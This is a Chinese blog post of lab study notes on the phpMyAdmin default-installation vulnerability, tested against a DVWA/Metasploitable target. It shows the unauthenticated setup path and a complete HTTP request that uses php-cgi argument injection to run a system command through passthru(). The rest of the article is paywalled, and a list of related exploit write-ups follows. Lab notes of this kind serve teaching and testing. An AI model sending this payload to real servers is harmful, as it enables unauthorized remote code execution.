关于phpMyAdmin默认安装漏洞的学习笔记

最新推荐文章于 2024-08-19 10:36:04 发布
最新推荐文章于 2024-08-19 10:36:04 发布
阅读量6k 收藏 4
点赞数 1
分类专栏: DVWA 漏洞 Kali Web安全 渗透 文章标签: 漏洞 DVWA 信息安全 phpmyadmin Kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SKI_12/article/details/59085529
版权
本文详细记录了phpMyAdmin默认安装存在的漏洞,包括如何直接利用漏洞执行系统命令,向服务器写文件,使用php-reverse-shell.php反弹shell,以及服务器主动打开监听端口。通过Burpsuite进行操作,结合Kali Linux中的工具进行实战演示。
摘要由CSDN通过智能技术生成
简单地说,phpMyAdmin是安装在Web服务器上的接口界面,主要用于使用php来管理安装在服务器上的后台数据库。在老的版本中,若管理员没有对相应配置信息进行处理的话就会导致漏洞的存在。在dvwa中phpMyAdmin的默认安装中会存在漏洞,用户可以在路径中不需要输入账号密码就可以直接访问其中的phpMyAdmin/setup目录:
http://10.10.10.137/phpMyAdmin/setup

利用:

直接利用漏洞执行php中的系统命令返回结果:

可以在Burpsuite中将下列代码上传:

POST http://10.10.10.137/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
Host:10.10.10.137
Content-Length: 34

<?php
passthru('pwd');
die();
?>

上述URL中的代码主要是修改php的主配置文件php.ini,从而可以执行下面插入的php代码;在php代码中,passthru()函数会执行里面的操作系统执行并显示出来,die()函数则会将无关的页面返回信息终止掉、方便查看结果信息。这样的方法并不会在服务器中保存任何文件,只是代码执行之后就把结果返回过来。

加了die()函数:

最低0.47元/天 解锁文章
Mi1k7ea
关注
专栏目录
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
phpMyAdmin setup.php脚本的任意PHP代码注入漏洞
weixin_34343308的博客
03-21 2685
phpMyAdmin (/scripts/setup.php) PHP 注入代码 此漏洞代码在以下环境测试通过:phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 及 3.0.1.1版本;Linux内核版本 2.6.24-24-generic i686 GNU/Linux (Ubuntu ...
记【phpMyAdmin默认安装漏洞
初学者L_言的博客
11-11 3467
一、工具 BrupSuit kali 靶机 Metasploitable2 只要是基于php-mysql 的服务器(靶机) 一般都可尝试去查看是否存在这个漏洞 二、 /setup 目录 mysql默认安装是会产生 /phpMyAdmin 这个目录, 而这个目录下有个 /setup 目录 这个目录可以在不登入的情况下访问,并对服务器的数据库进行配置 e.g. 基于安全考虑,一般服务器在配置好数据...
PHP Reverse Shell 使用教程
最新发布
gitblog_00757的博客
08-19 309
PHP Reverse Shell 使用教程 php-reverse-shellPHP shells that work on Linux OS, macOS, and Windows OS.项目地址:https://gitcode.com/gh_mirrors/php/php-reverse-shell 项目介绍 php-reverse-shell 是一个开源项目,旨在为渗透测试人员提供一个可...
Phpmyadmin Scripts / setup.php反序列化漏洞 WooYun-2016-199433 漏洞复现
ADummy的博客
02-27 466
Phpmyadmin Scripts / setup.php反序列化漏洞(WooYun-2016-199433) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>有回显读取文件 0x01漏洞介绍 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码 影响版本 phpmyadmin 2.x 0x02漏洞复现 payload POST /scripts/setup.php HTTP/1.1 Host: your-ip:808
漏洞复现-Phpmyadmin setup.php反序列化漏洞(WooYun-2016-199433)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-04 3908
phpMyAdminSetup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
手工挖洞学习笔记phpMyAdmin 默认安装漏洞(小白自学)/写入webshell/写入php反弹shell
AI_Jardon的博客
08-12 1083
phpMyAdmin 默认安装 工具: (1)burpsuite (2)靶机:Metasploitable2 前提: 靶机IP:192.168.1.175 由于是http协议,所以端口:80 验证漏洞 到达靶机源url 在url中插入:…//phpMyAdmin/setup 得到: 说明存在phpMyAdmin默认安装漏洞 利用漏洞 打开burpsuite —进入repeater 如图: 开始利用漏洞: 首先:编写目标IP、端口 输入前提上的目标IP、端口 注意:此处use HTTPS 针对于使用
Kali linux 学习笔记(四十五)Web渗透——漏洞挖掘之默认安装 2020.3.23
闵行小鱼塘
03-23 800
一些默认安装程序的漏洞
WEB安全学习笔记
chenrs727的博客
12-02 1983
基础入门 1.基础入门——基础概念 域名 什么是域名 域名(英语:Domain Name),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识(有时也指地理位置) 由于IP地址具有不方便记忆并且不能显示地址组织的名称和性质等缺点,人们设计出了域名,并通过网域名称系统(DNS,Domain Name System)来将域名和IP地址相互映射,使人更方便地访问互联网,而不用去记住能够被机器直接读取的IP地址数串。 比如www.bai
手动漏洞挖掘 phpMyAdmin默认安装
胡乱写点什么
08-11 1339
手动漏洞挖掘(一) 学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。 —— phpMyAdmin默认安装漏洞—— 需要的工具: burpsuit 靶机(我选择的是Metasploitable2) 一.利用漏洞重放数据 首先在burpsuite的Repeater输入以下代码: POST http://192.168.52.130/php...
反序列化漏洞——http://159.75.16.25:8066 phpmyadmin scripts/setup.php 反序列化漏洞 http://159.75.16.25
m0_52341820的博客
04-14 401
php反序列化漏洞漏洞原理,如何防御此漏洞?如何利用此漏洞? 原理: 未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果 防御: 进行签名与认证,避免应用接受黑客的异常输入 限制序列化与反序列化的类,避免接受任何处理类型 RASP检测,判断应用是否执行了非应用本身的逻辑 利用: 通过该漏洞,可以在内容中嵌入执行自定义命令的代码,获取服务器的权限 可以构造其他,导致耗尽服务器的CPU,停止服务 可以获得途径 2、http:
默认安装phpMyAdmin 会存在哪些安全隐患
发哥微课堂
12-20 2035
0x00:简介 phpMyAdmin 大家很熟悉了,很多服务器都会默认安全,用来管理数据库。默认安装的情况下会存在一些安全隐患。 0x01:隐患 首先是默认setup 目录,phpMyAdmin 安装后的 setup 目录可以直接访问,这个目录可以执行一些操作,暴露一些隐私信息,如下图: 其次是,可以通过 phpMyAdmin 来修改 php 的 ini 配置文件,这意味着可以配置...
phpMyAdmin 4.7.x CSRF 漏洞利用
Ambulong的博客
06-12 653
phpMyAdmin是个知名MySQL/MariaDB在线管理工具,phpMyAdmin团队在4.7.7版本中修复了一个危害严重的CSRF漏洞(PMASA-2017-9),攻击者可以通过诱导管理员访问恶意页面,悄无声息地执行任意SQL语句。 该篇文章我们将结合VulnSpy的在线phpMyAdmin环境来熟悉该漏洞的利用。 在线 phpMyAdmin CSRF 演练地址:https://www.v...
phpMyAdmin setup.php脚本PHP代码注入漏洞
weixin_33736649的博客
06-19 423
影响版本: phpMyAdmin phpMyAdmin 3.xphpMyAdmin phpMyAdmin 2.11.x 漏洞描述: phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。 phpMyAdminSetup脚本用于生成配置。如果远程***者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php 配置文件中包含...
phpMyAdmin漏洞安全防范
willow_liang的博客
11-28 1509
1.主要功能 数据库在线管理工具 操作数据. 执行mysq|命令 导出和导入数据库 网页版的mysq|管理工具 2.危害 MySQL数据库导出(数据库拖库) 执行导出Webshell 修改数据库 3.phpMyAdmin渗透利用思路 MySQL root密码暴力破解 源代码泄露 读取配置文件 root账号及权限三种方法获取Webshell SQLMAP直连数据库获取权限 社工方法来获取权限 4.phpMyAdmin防范思路 重命名文件夹. 禁止列目录漏洞 设置数据库高强度密
phpmyadmin漏洞汇总
m0_64481831的博客
05-27 1528
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
phpmyadmin scripts/setup.php 反序列化漏洞
千寻的博客
03-21 1780
序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中,当在php中创建了一个对象后,可以通过把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。序列化就是将对象的状态信息转为字符串储存起来那么反序列化就是再将这个。
Vulhub靶场-phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433)
Grace_for_it的博客
05-03 582
vulhub靶场复现 php源码 bp抓包 网络安全 渗透测试
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值